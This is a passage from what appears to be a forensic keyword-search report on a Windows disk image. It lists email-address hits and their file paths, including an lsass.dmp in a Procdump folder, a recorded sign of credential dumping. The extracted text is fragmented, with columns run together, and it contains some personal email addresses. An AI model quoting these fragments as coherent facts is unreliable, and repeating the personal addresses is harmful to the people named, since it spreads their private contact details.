ome page tab group. /img_disk.raw/vol_vol7/Windows/SysWOW64/en-US/ieframe.dll.mui

5the httpfolder beh
ome page tab group. /img_disk.raw/vol_vol7/Windows/System32/en-US/ieframe.dll.mui

5the httpfolder beh
ome page tab group. /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« ieframe.resources_31bf3856ad364e35_11.0.17763.1_en-
5the httpfolder beh us_b47dacee90b1a0bb/ieframe.dll.mui
Page 109/145
T
a
Preview Source File
g
s
ome page tab group. /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

«[email protected]« ieframe.resources_31bf3856ad364e35_11.0.17763.1_en-
5the httpfolder beh us_bed25740c51262b6/ieframe.dll.mui
[email protected]
T
a
Preview Source File
g
s
france pari pm/sgdn /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

31429230172 /f:t 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin
n1 dcssi1 igc/a1#0! /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

n1 dcssi1 igc/a1#0! /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

021213142923z 2010
n1 dcssi1 igc/a1#0! /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsas
021213142923z 2010 s.dmp
n1 dcssi1 igc/a1#0! /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

021213142923z 2010
n1 dcssi1 igc/a1#0! /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

021213142923z 2010
n1 dcssi1 igc/a1#0! /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-

021213142923z 2010 dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/cry
Page 110/145
T
a
Preview Source File
g
s
pt32.dll
n1 dcssi1 igc/a1#0! /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-

021213142923z 2010 dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/cry
pt32.dll
[email protected]
T
a
Preview Source File
g
s
w.abcdef.hr\ pošta: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

ćavarovi nis
w.abcdef.hr\ pošta: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

ćavarovi nis 7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
t online services : /img_disk.raw/vol_vol7/Program

«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8we
«. ", a windows. kyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
[email protected]
Ta
Preview Source File
gs
3856ad36 4e35 =fil /

«[email protected]«;m9a;.d@; b;.d $path img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/42
Page 111/145
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
hrea model dspp /

\t$@«[email protected]« ?!?!0! img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/42
h=4f3d1c70-b 0eca21891c0180_blobs.bin
[email protected]
T
a
Preview Source File
g
s
ujte nás na e-mail: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«[email protected]« (x shared/ink/Alphabet.xml
+y+z+
ujte nás na e-mail: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« (x t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
+y+z+ 7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
[email protected] yllm 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
[email protected] yllm
Page 112/145
T
a
Preview Source File
g
s
ac/anfserverca.crl0 /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.dm
[email protected] yllm p
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
[email protected] yllm dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt32.
dll
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
[email protected] yllm dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt32.
dll
[email protected]
T
a
Preview Source File
g
s
ieren sie uns unter /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«. "holt die i
ieren sie uns unter /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1
«. "holt die i e7da144/Alphabet.xml
Page 113/145
[email protected]
T
a
Preview Source File
g
s
.ocsp.d-trust.net03 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
http://www.d-trust.
.ocsp.d-trust.net03 /
«[email protected]« img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.d
http://www.d-trust. mp
.ocsp.d-trust.net03 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
.ocsp.d-trust.net03 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
.ocsp.d-trust.net03 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
http://www.d-trust. dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt32
.dll
.ocsp.d-trust.net03 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
http://www.d-trust. dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt32
.dll
[email protected]
T
a
Preview Source File
g
s
zigno root ca 20091 «info@e- /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

szigno.hu«0 090616113018z Defender/Scans/mpcache-
2912 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
Page 114/145
T
a
Preview Source File
g
s
zigno root ca 20091 «info@e- /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

szigno.hu«0 090616113018z
2912
zigno root ca 20091 «info@e- /

szigno.hu«0 090616113018z img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.
2912 dmp
zigno root ca 20091 «info@e- /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

szigno.hu«0 090616113018z
2912
zigno root ca 20091 «info@e- /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

szigno.hu«0 090616113018z
2912
zigno root ca 20091 «info@e- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

szigno.hu«0 090616113018z crypt32-
2912 dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt
32.dll
zigno root ca 20091 «info@e- /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

szigno.hu«0 090616113018z crypt32-
2912 dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt
32.dll
[email protected]
T
a
Preview Source File
g
s
ce1 globaltrust1$0" /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

Page 115/145
T
a
Preview Source File
g
s
ce1 globaltrust1$0" /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

060807141235z 3609
ce1 globaltrust1$0" /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass
060807141235z 3609 .dmp
ce1 globaltrust1$0" /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

060807141235z 3609
ce1 globaltrust1$0" /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

060807141235z 3609
ce1 globaltrust1$0" /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

060807141235z 3609 dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/cryp
t32.dll
ce1 globaltrust1$0" /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

060807141235z 3609 dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/cryp
t32.dll
[email protected]
T
a
Preview Source File
g
s
fax:0125/252524 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« a..ence-mitigations-
www.incomedia.it c1_31bf3856ad364e35_10.0.17763.1_none_fce8220f4a75d7c9/sysmain.s
db
Page 116/145
T
a
Preview Source File
g
s
fax:0125/252524 /img_disk.raw/vol_vol7/Windows/apppatch/sysmain.sdb
www.incomedia.it
[email protected]
T
a
Preview Source File
g
s
u -t'h ls97# dmmd /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

«[email protected]« 1g0e Defender/Scans/mpcache-
>izenpe s.a. - 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
asteiz1 izenpe.com1 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

030130230000z 1801
asteiz1 izenpe.com1 /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass
030130230000z 1801 .dmp
asteiz1 izenpe.com1 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

030130230000z 1801
asteiz1 izenpe.com1 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

030130230000z 1801
asteiz1 izenpe.com1 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

030130230000z 1801 dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt
32.dll
Page 117/145
T
a
Preview Source File
g
s
asteiz1 izenpe.com1 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

030130230000z 1801 dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt
32.dll
[email protected]
T
a
Preview Source File
g
s
mintt kozjegyzoiqa) /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

71121215 sgh 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin
) tanusitvanykiado1 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
) tanusitvanykiado1 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
030330014711z 2212
) tanusitvanykiado1 /
030330014711z 2212 dmp
) tanusitvanykiado1 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
030330014711z 2212
) tanusitvanykiado1 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
030330014711z 2212
Page 118/145
T
a
Preview Source File
g
s
) tanusitvanykiado1 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
030330014711z 2212 dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt
32.dll
) tanusitvanykiado1 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
030330014711z 2212 dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt
32.dll
[email protected]
T
a
Preview Source File
g
s
en vagy kerhetok az /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

«[email protected]« e-mail Defender/Scans/mpcache-
cimen. warni 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
en vagy kerhetok az /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

«[email protected]« e-mail
cimen. warni
en vagy kerhetok az /
«[email protected]« e-mail img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.d
cimen. warni mp
en vagy kerhetok az /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

cimen. warni
en vagy kerhetok az /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

cimen. warni
en vagy kerhetok az /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« e-mail crypt32-
cimen. warni dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt3
Page 119/145
T
a
Preview Source File
g
s
2.dll
en vagy kerhetok az /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

«[email protected]« e-mail crypt32-
cimen. warni dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt3
2.dll
[email protected]
T
a
Preview Source File
g
s
ur een e-mail naar /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

"«[email protected]«" shared/ink/Alphabet.xml
zei hij. de
ur een e-mail naar /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

"«[email protected]«" t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
zei hij. de 7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
uusi osoitteeni on: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

huimassa q-
uusi osoitteeni on: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

huimassa q- e7da144/Alphabet.xml
Page 120/145
[email protected]
T
a
Preview Source File
g
s
ment em trobareu a: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

a kenya i z
ment em trobareu a: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«. t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb
a kenya i z 1e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
x ;;$` a<z/ ba4{wa5 /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

«[email protected]« 4@`&
6$4b6b @7w( 8t
x ;;$` a<z/ ba4{wa5 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« 4@`& speechrecognizer-en-
6$4b6b @7w( 8t us_31bf3856ad364e35_10.0.17763.1_none_a7d4b3ba449618b9/l1033.ng
r
[email protected]
T
a
Preview Source File
g
s
author: jack doyle, /

«[email protected] img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.Micros
m« **/ var oftEdge_8wekyb3d8bbwe/AC/#!
_gsscope="u 001/MicrosoftEdge/Cache/Y2A6TZJV/TweenMax.min[1].js
Page 121/145
T
a
Preview Source File
g
s

_gsscope="u 001/MicrosoftEdge/Cache/YATO9SWU/tweenmax_1.18.0_499ba64a233785
45748ff12d372e59e9_min[1].js

_gsscope="u 001/MicrosoftEdge/Cache/YG3Z5EVG/tweenmax_1.20.0_d360d9a082ccc13
b1a1a9b153f86b378_min[1].js
[email protected]
T
a
Preview Source File
g
s
c.edu) jane hunter /img_disk.raw/vol_vol7/Program

(«[email protected]«) Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8w
pete johnston (p.j ekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
Shared/OFFICE16/MSO.DLL
[email protected]
Ta
Preview Source File
gs
.info> jon masters /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> permission is Tools/open_source_licenses.txt
her
Page 122/145
[email protected]
T
a
Preview Source File
g
s
redak. mail: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

vrhovni sud
redak. mail: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7da
vrhovni sud 144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
tion: &owner (e.g., /img_disk.raw/vol_vol7/Windows/System32/en-US/filemgmt.dll.mui

«[email protected]
soft.com« or redmond\jeffsmit
tion: &owner (e.g., /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-

«[email protected] windows-
soft.com« or redmond\jeffsmit s..foldersui.resources_31bf3856ad364e35_10.0.17763.1_en-
us_a7a47fab54c3501b/filemgmt.dll.mui
[email protected]
T
a
Preview Source File
g
s
rtsetzen zu k nnen. /
01/01/2000" 0-9 rnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
01/01/2000" 0-9 .DLL
Page 123/145
T
a
Preview Source File
g
s
01/01/2000" 0-9 bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FXS
RES.DLL
[email protected]
T
a
Preview Source File
g
s
2 _mz@h4 ]md? h}gm /img_disk.raw/vol_vol7/Windows/Globalization/ICU/icudtl.dat

>«[email protected]« klnf
ll8}mfml9} fws
2 _mz@h4 ]md? h}gm /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-i..-

>«[email protected]« klnf unicode-
ll8}mfml9} fws components_31bf3856ad364e35_10.0.17763.1_none_096070e3e9e37eaf/
icudtl.dat
[email protected]
Ta
Preview Source File
gs
mark adler /img_disk.raw/vol_vol7/pagefile.sys

madler@alu
y mark adler /img_disk.raw/vol_vol7/Program Files/VMware/VMware

«[email protected]« Tools/open_source_licenses.txt
madler@alu
mark adler /img_disk.raw/vol_vol7/Program

«[email protected]« Files/WindowsApps/Microsoft.Office.OneNote_16001.10228.20003.0_x64__
madler@alu 8wekyb3d8bbwe/resources.pri
Page 124/145
Ta
Preview Source File
gs
mark adler /img_disk.raw/vol_vol7/Program

«[email protected]« Files/WindowsApps/microsoft.windowscommunicationsapps_17.9330.21365.
madler@alu 0_x64__8wekyb3d8bbwe/resources.pri
mark adler /
«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/18.143
madler@alu .0717.0002/ThirdPartyNotices.txt
mark adler /
«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/18.143
madler@alu .0717.0002_1/ThirdPartyNotices.txt
[email protected]
Ta
Preview Source File
gs
2011 joseph adams /img_disk.raw/vol_vol7/pagefile.sys

<«[email protected]«>
permission is
2011 joseph adams /

<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/
permission is OneDrive/18.143.0717.0002/ThirdPartyNotices.txt
2011 joseph adams /

<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/
permission is OneDrive/18.143.0717.0002_1/ThirdPartyNotices.txt
[email protected]
T
a
Preview Source File
g
s
jr. e-mail: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

tel. & fax.: 994638
jr. e-mail: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

Page 125/145
T
a
Preview Source File
g
s
tel. & fax.: 994638 7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
sent this offer to /

«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
<svg class=\"circl MicrosoftEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/KBBFFLP4/features[1].json
ribe-tagline /
email">«john.smith@gmail. img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
com«</span> </p> </div> MicrosoftEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/YATO9SWU/9QX61ZMY.dat

opinions opinions MicrosoftEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/YATO9SWU/VJSY8Q91.htm

"},"f00wntb05fw8zr MicrosoftEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/YATO9SWU/features[1].json

001/MicrosoftEdge/Cache/YATO9SWU/features[2].json

001/MicrosoftEdge/Cache/YG3Z5EVG/features[2].json
Page 126/145
[email protected]
T
a
Preview Source File
g
s
ct cancelhexamples: /img_disk.raw/vol_vol7/Windows/System32/en-US/RADCUI.dll.mui
https://contoso.com
/feed/webfeed.aspx /img_disk.raw/vol_vol7/Windows/System32/en-US/TSWorkspace.dll.mui
connection settings
ct cancelhexamples: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« t..ce-radcui.resources_31bf3856ad364e35_10.0.17763.1_en-
https://contoso.com us_8919adcf64c1ba46/RADCUI.dll.mui
/feed/webfeed.aspx /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« t..workspace.resources_31bf3856ad364e35_10.0.17763.1_en-
connection settings us_01b17dede968f8e3/TSWorkspace.dll.mui
[email protected]
T
a
Preview Source File
g
s
osta vastaanottajia /
01/01/2000)objet ob rnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
01/01/2000)objet ob S.DLL
01/01/2000)objet ob bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FXS
RES.DLL
Page 127/145
[email protected]
Ta
Preview Source File
gs
2010 jorge jimenez /img_disk.raw/vol_vol7/Program Files/VMware/VMware

2010
[email protected]
Ta
Preview Source File
gs
jose i. echevarria /img_disk.raw/vol_vol7/Program

(«[email protected]«) Files/VMware/VMware
copyright (c) 2010 Tools/open_source_licenses.txt
[email protected]
T
a
Preview Source File
g
s
2016 josh chisholm /img_disk.raw/vol_vol7/Program

<«joshuachisholm@gmail. Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64_
com«> ==== es6-promise _8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
c Shared/OFFICE16/MSO99LRES.DLL
[email protected]
Ta
Preview Source File
gs
ould contact ijg at «jpeg- /img_disk.raw/vol_vol7/Program Files/VMware/VMware

[email protected]« to be added to our Tools/open_source_licenses.txt
[email protected]
T
a
Preview Source File
g
s
està l'arxiu per a /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«[email protected]«. en shared/ink/Alphabet.xml
html, la
Page 128/145
T
a
Preview Source File
g
s
està l'arxiu per a /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«. en t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7
html, la da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
2 j. ryan stinnett /img_disk.raw/vol_vol7/Program

<«[email protected]«>\n\np Files/WindowsApps/Microsoft.SkypeApp_14.26.95.0_x64__kzf8qxf38z
ermission is h g5c/ReactAssets/index.windows.bundle
[email protected]
T
a
Preview Source File
g
s
osoitteeni on /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«. etsi (c:\da
osoitteeni on /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7
«. etsi (c:\da da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
julie est à /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

« depuis peu.
julie est à /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7d
Page 129/145
T
a
Preview Source File
g
s
« depuis peu. a144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
voyez à l'adresse : /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

zara, plutô
voyez à l'adresse : /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

zara, plutô e7da144/Alphabet.xml
[email protected]
Tag
Preview Source File
s
optype30{\staticval «[email protected]«} /
{\propname msip_lab img_disk.raw/vol_vol7/Windows/Panther/
setupinfo
[email protected]
T
a
Preview Source File
g
s
kontaktujte nás na /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«.
kontaktujte nás na /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7da
«. 144/Alphabet.xml
Page 130/145
[email protected]
T
Preview Source File a
gs
code by phil karn /img_disk.raw/vol_vol7/Windows/System32/drivers/rmcast.sys

(«[email protected]«
), * robe
code by phil karn /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

(«[email protected]« rmcast_31bf3856ad364e35_10.0.17763.1_none_4543b616e0146b6c/rmc
), * robe ast.sys
[email protected]
T
a
Preview Source File
g
s
alinkite gav jus ia /

01/01/20007subject nms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL

01/01/20007subject DLL

01/01/20007subject bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FXSR
ES.DLL
[email protected]
T
a
Preview Source File
g
s
onmicrosoft.com v i /img_disk.raw/vol_vol7/Program
m«. parandage viga ja wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
Page 131/145
[email protected]
T
a
Preview Source File
g
s
eab olema vormingus /img_disk.raw/vol_vol7/Program

soft.com« v i __8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
kasutaja@contos Shared/OFFICE16/MSOIDRES.DLL
[email protected]
T
a
Preview Source File
g
s
para o meu e-mail: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«. § não há re
para o meu e-mail: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«. § não há re 1e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
ssaadid nimekirjast /
2000.01.01"t ma t m prnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
2000.01.01"t ma t m S.DLL
2000.01.01"t ma t m 1bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FX
SRES.DLL
Page 132/145
[email protected]
T
a
Preview Source File
g
s
%s not responding. /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

server_alive_check
responding from %s /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

client_alive_check
%s not responding. /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

select: %s connecti
%s not responding. /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-

select: %s connecti onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e35
c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
actar-me no e-mail: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

. o festival
actar-me no e-mail: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

. o festival e7da144/Alphabet.xml
Page 133/145
[email protected]
T
a
Preview Source File
g
s
e examples: kevinc, /
«[email protected]«, img_disk.raw/vol_vol7/Windows/SystemApps/Microsoft.AccountsControl
domain\kevinctypes _cw5n1h2txyewy/pris/resources.en-US.pri
e examples: kevinc, /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«, a...appxmain.resources_31bf3856ad364e35_10.0.17763.1_en-
domain\kevinctypes us_0f547f45b0a26642/resources.en-US.pri
[email protected]
T
a
Preview Source File
g
s
author: kai mallea /

(«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.Micro
) * * @license: http softEdge_8wekyb3d8bbwe/AC/#!001/MicrosoftEdge/Cache/KBBFFLP4/cnn-
ais[1].js

)\n *\n * @license: softEdge_8wekyb3d8bbwe/AC/#!001/MicrosoftEdge/Cache/Y2A6TZJV/cnn-
header-second-react.min[1].js

) * * @license: http softEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/YATO9SWU/cnn-ais[1].js

) * * @lic softEdge_8wekyb3d8bbwe/AppData/User/Default/CacheStorage/Files4/7KZ
CBXO4_3/M68ZO8P9_4/1851IG0HZO_61
Page 134/145
[email protected]
T
a
Preview Source File
g
s
onmicrosoft.com ili /img_disk.raw/vol_vol7/Program

m«. ispravite ga i pok wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
[email protected]
T
a
Preview Source File
g
s
mora biti u obliku: /img_disk.raw/vol_vol7/Program

«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64_
osoft.com« ili _8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
korisnik@contos Shared/OFFICE16/MSOIDRES.DLL
[email protected]
T
a
Preview Source File
g
s
c.uk), carl lagoze /img_disk.raw/vol_vol7/Program

(«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8
«) this schema declar wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
Shared/OFFICE16/MSO.DLL
[email protected]
Ta
Preview Source File
gs
(c) dmitry golubev /img_disk.raw/vol_vol7/pagefile.sys

<«[email protected]«>, 2003-
2004 cop
(c) dmitry golubev /

<«[email protected]«>, 2003- img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneD
2004 cop rive/18.143.0717.0002/ThirdPartyNotices.txt
Page 135/145
Ta
Preview Source File
gs
(c) dmitry golubev /

<«[email protected]«>, 2003- img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneD
2004 cop rive/18.143.0717.0002_1/ThirdPartyNotices.txt
[email protected]
T
a
Preview Source File
g
s
" 39) /
href="mailto:«lena.su img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.Microsof
[email protected]«? tEdge_8wekyb3d8bbwe/AC/#!001/MicrosoftEdge/Cache/KBBFFLP4/mystery-
subject='mystery lu lung-illness-linked-vaping-health-officials-investigating-nearly-possible-
cases[1].htm
[email protected]
T
a
Preview Source File
g
s
" 45) /
href="mailto:«lindsey.b img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.Micros
